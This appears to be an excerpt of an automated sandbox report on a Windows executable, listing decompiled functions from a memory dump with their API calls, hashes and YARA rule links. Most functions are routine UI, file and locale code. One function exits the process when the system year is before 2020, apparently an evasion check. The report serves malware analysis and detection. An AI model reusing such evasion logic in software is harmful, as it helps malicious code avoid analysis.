Instruction Fuzzy Hash: D8018F70700604AFE311FBBACC63B1DB2A8DB88B14F62417BF504A76C1DA786E10856D

Uniqueness

Uniqueness Score: -1.00%

Function 00439CA4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00439CA4(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				void* __edi;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t68;
				void* _t69;

				_t68 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t69 = _t17 - 0x84;
				if(_t69 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E004362E4(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00436DF4(_t50, _t68);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E00439C10(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043C4F8(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t68 + 8)));
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_t32 = E0043C1F4(_t50);
						_push(_t32);
						L00406D8C();
						return _t32;
					}
					goto L27;
				}
				if(_t69 == 0) {
					_t21 = E00436DF4(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E004072E8( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E004356B8(_t50,  &_v28,  &_v20);
					_t21 = E00439B7C(_t50, 0,  &_v28, _t65, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t68 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t66 = E0044CA0C(__eax);
					if(_t66 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t66 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043C1F4(__eax);
						if(_t45 == GetCapture() &&  *0x4769c0 != 0) {
							_t47 =  *0x4769c0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x4769c0; // 0x0
								E00436D28(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}

0x00439caa
0x00439cac
0x00439cae
0x00439cb0
0x00439cb5
0x00439cd4
0x00439cd7
0x00439db4
0x00439dbb
0x00439e06
0x00439e06
0x00439e06
0x00439df7
0x00000000
0x00439dfb
0x00439ce5
0x00439d7e
0x00439d85
0x00000000
0x00000000
0x00439d8b
0x00000000
0x00000000
0x00439d8f
0x00439d96
0x00000000
0x00000000
0x00439d9b
0x00439d9f
0x00439da2
0x00439da5
0x00439daa
0x00439dab
0x00000000
0x00439dab
0x00000000
0x00439ceb
0x00439cb7
0x00439d2d
0x00439d36
0x00000000
0x00000000
0x00439d45
0x00439d54
0x00439d61
0x00439d68
0x00000000
0x00000000
0x00439d6e
0x00000000
0x00439d6e
0x00439cb9
0x00439cbc
0x00439cf7
0x00439cfb
0x00000000
0x00000000
0x00439d07
0x00439d0f
0x00000000
0x00000000
0x00000000
0x00439d15
0x00439cbe
0x00439cbf
0x00439d1e
0x00000000
0x00000000
0x00439cc1
0x00439cc4
0x00439dc1
0x00439dcf
0x00439dda
0x00439de2
0x00439ded
0x00439df2
0x00439df2
0x00439de2
0x00439dcf
0x00439cc4

APIs

GetCapture.USER32 ref: 00439DC8

Strings

, xrefs: 00439D1A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture
String ID:
API String ID: 1145282425-3916222277
Opcode ID: 9bcc22c7be471c5a05c3657320bc811d13cf008686eb6c568fa4ffafb8aa2774
Instruction ID: 7b750f2d1ec484cf15bdf7c55352870e6a5630c910734ca3872b29b0e5d8de39
Opcode Fuzzy Hash: 9bcc22c7be471c5a05c3657320bc811d13cf008686eb6c568fa4ffafb8aa2774
Instruction Fuzzy Hash: 9C318B713002015BCA20EE3E888765B6296AB4D319F10B93FB456CB782DABCDC09C78D

Uniqueness

Uniqueness Score: -1.00%

Function 00423388, Relevance: 4.6, APIs: 3, Instructions: 51
fileclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423388(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x49112c; // 0x41d4c0
					E004209C4(_t35);
				}
				E00422B5C(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}

0x00423391
0x0042339a
0x0042339e
0x004233a0
0x004233a5
0x004233a5
0x004233ac
0x004233b1
0x004233bc
0x004233c9
0x004233d4
0x004233dd
0x004233e0
0x004233e6
0x004233f6
0x00423408

APIs

GetClipboardData.USER32 ref: 00423395
CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 004233B7
GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 004233C9

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$ClipboardCopyDataHeader
String ID:
API String ID: 1752724394-0
Opcode ID: b358ccab6d590465a263efcaf69de369a618d5d7e92ca8e83eb8a265b3570793
Instruction ID: 0815d0994c1443e6aa60583e541399deb611f130c4e771789cffcd43ab994bb2
Opcode Fuzzy Hash: b358ccab6d590465a263efcaf69de369a618d5d7e92ca8e83eb8a265b3570793
Instruction Fuzzy Hash: A0115A727002009FC710DF6AC885A9ABBF8AF49310B11456AE909DB292DA75EC05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00453E2C, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00453E2C() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x492c14 = GetCurrentThreadId();
				L5:
				_t5 =  *0x492c18; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x492c04 != 0 &&  *((intOrPtr*)( *0x492c04 + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E004343EC( &_v12) == 0) {
							E004561CC( *0x492c04);
						}
					}
					goto L5;
				}
				return _t6;
			}

0x00453e3d
0x00453e6d
0x00453e6f
0x00453e75
0x00453e7f
0x00453e47
0x00453e55
0x00453e64
0x00453e68
0x00453e68
0x00453e64
0x00000000
0x00453e47
0x00453e85

APIs

GetCurrentThreadId.KERNEL32 ref: 00453E38
GetCursorPos.USER32(?), ref: 00453E55
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00453E75

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: ebe90117e7d654759caa79fae3dd9584bcbc1e8f78588f7732d57f03c026c916
Instruction ID: 21eb5b946263d9f6c1fb8590bbf8a4f695cb4b5534662adceb95a1fed77a8df9
Opcode Fuzzy Hash: ebe90117e7d654759caa79fae3dd9584bcbc1e8f78588f7732d57f03c026c916
Instruction Fuzzy Hash: 48F0E931104204ABDB20EB5DE887B5B33D89B04706F400437E900971D3DB7DAA98C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00475588, Relevance: 4.5, APIs: 3, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00475588(signed int __eax) {
				signed int _t3;
				signed int _t7;
				struct _SYSTEMTIME* _t9;

				_t3 = __eax;
				_t7 = __eax;
				GetSystemTime(_t9);
				if(_t9->wYear < 0x7e4) {
					ExitProcess(0);
				}
				GetNextDlgTabItem(0, 0, 0);
				return _t3 & 0xffffff00 | _t7 == 0x80000001;
			}

0x00475588
0x0047558c
0x0047558f
0x0047559a
0x0047559e
0x0047559e
0x004755b4
0x004755bf

APIs

GetSystemTime.KERNEL32 ref: 0047558F
ExitProcess.KERNEL32(00000000), ref: 0047559E
GetNextDlgTabItem.USER32(00000000,00000000,00000000), ref: 004755B4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitItemNextProcessSystemTime
String ID:
API String ID: 224316892-0
Opcode ID: 84d21c88a90231f7c7ee64b317c1e7ed5ab0b0b48e34c8ae56b9f8309f8c2df6
Instruction ID: f76412dc200bf56e879a5a0b341a2a3843362a9f59fda5b5d9f9fe52aba29090
Opcode Fuzzy Hash: 84d21c88a90231f7c7ee64b317c1e7ed5ab0b0b48e34c8ae56b9f8309f8c2df6
Instruction Fuzzy Hash: F2D0A7413863002AFA2032641C83BA820449700734F21063FBE59AE2C6D5EF16A0416F

Uniqueness

Uniqueness Score: -1.00%

Function 0043B378, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043B378(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0043B2C8(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x49111c; // 0x492c04
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E0044CA0C(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E00436D28(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}

0x0043b37e
0x0043b381
0x0043b393
0x0043b3f1
0x0043b401
0x0043b410
0x00000000
0x0043b417
0x0043b406
0x0043b40e
0x00000000
0x00000000
0x0043b3c2
0x0043b3c2
0x0043b3cc
0x00000000
0x0043b3ce
0x0043b3d0
0x0043b3d5
0x0043b3d9
0x00000000
0x0043b3db
0x0043b3e8
0x0043b3ef
0x00000000
0x00000000
0x0043b3ef
0x0043b3d9
0x0043b3cc
0x0043b41e

APIs

IsIconic.USER32 ref: 0043B3B0
GetCapture.USER32 ref: 0043B3B9

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 23d81701dc312255216aeaa6afec37b8495194c7e61405e662b271d7e5283a7d
Instruction ID: 57f469e38e917b5427715fb3a830b9331ba317ff16728b653a51129bdb483f76
Opcode Fuzzy Hash: 23d81701dc312255216aeaa6afec37b8495194c7e61405e662b271d7e5283a7d
Instruction Fuzzy Hash: 57112B31B006159BDB20DB5ED995A6EB3E8EF08344F2490BAF904DB352D738ED449798

Uniqueness

Uniqueness Score: -1.00%

Function 00420A54, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00420A54(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x420af0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00420A00(_t22);
				} else {
					E004045B0( &_v264, 0x100,  &_v260);
					E0040A158(_v264, 1);
					E00403DA8();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00420AF7);
				return E00404348( &_v264);
			}

0x00420a60
0x00420a68
0x00420a69
0x00420a6e
0x00420a71
0x00420a79
0x00420a7d
0x00420ad2
0x00420aa3
0x00420ab4
0x00420ac6
0x00420acb
0x00420acb
0x00420ad9
0x00420adc
0x00420adf
0x00420aef

APIs

GetLastError.KERNEL32(00000000,00420AF0,?,00000000,?,00420B08,00000000,004240EF,00000000,00000000,0042428F,?,00000000,?,?), ref: 00420A74
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00420AF0,?,00000000,?,00420B08,00000000,004240EF,00000000), ref: 00420A9A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 95bcaa5485f0c0434fab04c2d88187d923b021d6774db2d333f9767ce06d7898
Instruction ID: 29710fd72ffb5be0b58cf4a2783170cc72c8d0cb519ed3d789b584e5797ae634
Opcode Fuzzy Hash: 95bcaa5485f0c0434fab04c2d88187d923b021d6774db2d333f9767ce06d7898
Instruction Fuzzy Hash: 7301D8703403145BD711EB619C82BDA72D8DB68704FD1407BB744F26C2EAF86D50851D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD2C, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040AD2C(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40ad90);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004045B0( &_v16, 7,  &_v11);
				_push(_v16);
				E0040879C(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040AD97);
				return E00404348( &_v16);
			}

0x0040ad2c
0x0040ad35
0x0040ad3a
0x0040ad3b
0x0040ad40
0x0040ad43
0x0040ad52
0x0040ad62
0x0040ad6a
0x0040ad73
0x0040ad7c
0x0040ad7f
0x0040ad82
0x0040ad8f

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040AD90), ref: 0040AD52
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040AD90), ref: 0040AD6B

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a10f1584edf36e48db65a37f0d4d8e23c10f524d51f0a26c72c027296aa50981
Instruction ID: c421c4c9d8db8c96e99ef7217520ae631830dba11926d4230e67d73d47eddac3
Opcode Fuzzy Hash: a10f1584edf36e48db65a37f0d4d8e23c10f524d51f0a26c72c027296aa50981
Instruction Fuzzy Hash: 7AF0F671E04308BFEB01EBE2CC4299EB3ABDBC4714F10C47AB610A3AC0EA7C65108658

Uniqueness

Uniqueness Score: -1.00%

Function 00408994, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408994(void* __eax, WORD* __ecx, signed int __edx) {
				WORD* _t15;
				void* _t21;
				long _t22;

				_t15 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_t21 = FindFirstFileA(E004047F8(__eax), __ecx + 0x18);
				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
				if(_t21 == 0xffffffff) {
					_t22 = GetLastError();
				} else {
					_t22 = E00408930(_t15);
					if(_t22 != 0) {
						E00408A08(_t15);
					}
				}
				return _t22;
			}

0x00408997
0x004089a0
0x004089b4
0x004089b6
0x004089bc
0x004089d9
0x004089be
0x004089c5
0x004089c9
0x004089cd
0x004089cd
0x004089c9
0x004089e0

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,00464E2A,00000000,00464FA4,?,00000000,00464FCC), ref: 004089AF
GetLastError.KERNEL32(00000000,?,?,?,?,00464E2A,00000000,00464FA4,?,00000000,00464FCC), ref: 004089D4

Part of subcall function 00408930: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040895D
Part of subcall function 00408930: FileTimeToDosDateTime.KERNEL32 ref: 0040896C

Part of subcall function 00408A08: FindClose.KERNEL32(?,?,004089D2,00000000,?,?,?,?,00464E2A,00000000,00464FA4,?,00000000,00464FCC), ref: 00408A14

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID:
API String ID: 976985129-0
Opcode ID: 8b31ba3c93cdc935a6af244849750f9007292355c1169708a7c5b72bc760fb11
Instruction ID: 22cd73cf336623ba11afa6a1d93786271dbce14b94461dc05c098c3df8c32421
Opcode Fuzzy Hash: 8b31ba3c93cdc935a6af244849750f9007292355c1169708a7c5b72bc760fb11
Instruction Fuzzy Hash: 2EE039B2B0162007C714BA6E598156B61C84A847B530A02BFF995FB386DA3CCC1243EE

Uniqueness

Uniqueness Score: -1.00%

Function 00408B5E, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B5E(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E004052D8(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E004052D8(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

0x00408b67
0x00408b6c
0x00408b6e
0x00408b6e
0x00408b81
0x00408b90
0x00408b93
0x00408ba0
0x00408ba3
0x00408ba8
0x00408bab
0x00408bad
0x00408bba
0x00408bbd
0x00408bc2
0x00408bc5
0x00408bc7
0x00408bd0

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408B81

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 4b5acabb144ed59b149ebd93e873086483ba8c58bd25aedd1fa2840baa145e7a
Instruction ID: a3a42d41917f3a60512d7062af1c660f3cd2e537236802e327de5140d6994112
Opcode Fuzzy Hash: 4b5acabb144ed59b149ebd93e873086483ba8c58bd25aedd1fa2840baa145e7a
Instruction Fuzzy Hash: 061100B5A00209AFDB00CFA9C981DFFB7F9EFC8304B14C56AA405E7254E6319E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0042E46C, Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0042E46C(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00406D8C();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x42e4a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E004037D8(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}

0x0042e475
0x0042e478
0x0042e47a
0x0042e480
0x0042e4c4
0x0042e4c8
0x0042e4c9
0x0042e4cd
0x0042e4d0
0x0042e4d1
0x0042e4d6
0x00000000
0x0042e4d6
0x0042e485
0x0042e48a
0x0042e48d
0x0042e497
0x0042e49e
0x0042e4a1
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042E4D1

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 7da0abff4af2abc1f0d2131a4165362e38cdb759093a8ade67378a5ae546f952
Instruction ID: b07f24da921e7bc928ff2d9519621b6fb5bd97d062d336a671e04885eca8c18e
Opcode Fuzzy Hash: 7da0abff4af2abc1f0d2131a4165362e38cdb759093a8ade67378a5ae546f952
Instruction Fuzzy Hash: DCF06D76704214AF9B10EF9BE891C96BBECEB497203A180B7F908D7741D275AD009B74

Uniqueness

Uniqueness Score: -1.00%

Function 00420FE4, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420FE4(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}

0x00420fea
0x00420fed
0x00420ff0
0x00420ff4
0x00420ff9
0x00420fff
0x00421000
0x0042100a
0x0042101d
0x00421026
0x0042102e
0x00421031
0x00421031
0x00000000
0x00000000
0x00000000
0x00000000
0x0042100c
0x0042100c
0x0042100f
0x00421011
0x00421014
0x00421017
0x00421017
0x00000000
0x0042100c
0x00421038

APIs

GetSystemInfo.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042428F), ref: 00420FF4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 041c2bb2925929663b0ecae354f44c9bed40b2fe769f783fbf9c4f68711966b8
